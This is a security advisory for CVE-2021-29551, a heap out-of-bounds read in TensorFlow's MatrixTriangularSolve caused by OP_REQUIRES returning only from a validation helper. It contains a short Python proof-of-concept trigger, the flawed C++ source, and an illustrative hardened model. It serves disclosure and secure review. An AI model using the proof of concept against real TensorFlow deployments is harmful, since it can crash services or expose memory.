CVE-2021-29551: OOB read in `MatrixTriangularSolve`
The implementation of `MatrixTriangularSolve` fails to terminate kernel execution if one validation condition fails:
```cpp
void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0,
                          const Tensor& in1) override {
  OP_REQUIRES(
      ctx, in0.dims() >= 2,
      errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims()));

  OP_REQUIRES(
      ctx, in1.dims() >= 2,
      errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims()));
}

void Compute(OpKernelContext* ctx) override {
  const Tensor& in0 = ctx->input(0);
  const Tensor& in1 = ctx->input(1);

  ValidateInputTensors(ctx, in0, in1);

  MatMulBCast bcast(in0.shape().dim_sizes(), in1.shape().dim_sizes());
  ...
}
```
Since `OP_REQUIRES` only sets `ctx->status()` to a non-OK value and calls `return`, and that `return` exits only `ValidateInputTensors`, not `Compute`, this allows malicious attackers to trigger an out-of-bounds read:
```python
import tensorflow as tf
import numpy as np

matrix_array = np.array([])
matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array, (1, 0)), dtype=tf.float32)
rhs_array = np.array([])
rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array, (0, 1)), dtype=tf.float32)
tf.raw_ops.MatrixTriangularSolve(matrix=matrix_tensor, rhs=rhs_tensor, lower=False, adjoint=False)
```
As the two input tensors are empty, the `OP_REQUIRES` in `ValidateInputTensors` should fire and interrupt execution. However, given the implementation of `OP_REQUIRES`, after the `in0.dims() >= 2` check fails, execution moves to the initialization of the `bcast` object. This initialization is done with invalid data and results in a heap OOB read.
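The control-flow problem described above, reduced to a self-contained C++ model. This is an added example, not TensorFlow's code or the advisory's: `Ctx`, `REQUIRE`, `ValidateInputs`, `ComputeUnchecked` and `ComputeChecked` are hypothetical stand-ins for `OpKernelContext`, `OP_REQUIRES` and the kernel's methods, and the rank-1 shape is a constructed input. It shows the error status being recorded while execution still reaches the next step, beside a caller that checks the status before continuing.

```cpp
// Simplified stand-in model, not TensorFlow source. All names here are
// hypothetical and exist only for this illustration.
#include <string>
#include <vector>

struct Ctx {
  bool ok = true;              // models ctx->status().ok()
  std::string error;           // models the status message
  bool reached_bcast = false;  // set if execution got past validation
};

// Models OP_REQUIRES: record the error, then return from the *enclosing*
// function only. The caller is not unwound.
#define REQUIRE(ctx, cond, msg) \
  do {                          \
    if (!(cond)) {              \
      (ctx).ok = false;         \
      (ctx).error = (msg);      \
      return;                   \
    }                           \
  } while (0)

using Shape = std::vector<long>;

void ValidateInputs(Ctx& ctx, const Shape& in0, const Shape& in1) {
  REQUIRE(ctx, in0.size() >= 2, "In[0] ndims must be >= 2");
  REQUIRE(ctx, in1.size() >= 2, "In[1] ndims must be >= 2");
}

// Pattern from the advisory: the helper's recorded failure is ignored.
Ctx ComputeUnchecked(const Shape& in0, const Shape& in1) {
  Ctx ctx;
  ValidateInputs(ctx, in0, in1);
  ctx.reached_bcast = true;  // stands in for constructing MatMulBCast
  return ctx;
}

// Hardened pattern: stop as soon as validation has recorded a failure.
Ctx ComputeChecked(const Shape& in0, const Shape& in1) {
  Ctx ctx;
  ValidateInputs(ctx, in0, in1);
  if (!ctx.ok) return ctx;
  ctx.reached_bcast = true;
  return ctx;
}
int main() {
  Ctx bad = ComputeUnchecked({3}, {3, 1});  // constructed rank-1 input
  return (bad.reached_bcast && !bad.ok) ? 0 : 1;
}
```

The same review question applies to any kernel that calls `OP_REQUIRES` from a helper: does the caller test the status before using the inputs the helper was meant to validate?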
References
- github.com/advisories/GHSA-vqw6-72r7-fgw7
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-479.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-677.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-188.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/480641e3599775a8895254ffbc0fc45621334f68
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vqw6-72r7-fgw7
- nvd.nist.gov/vuln/detail/CVE-2021-29551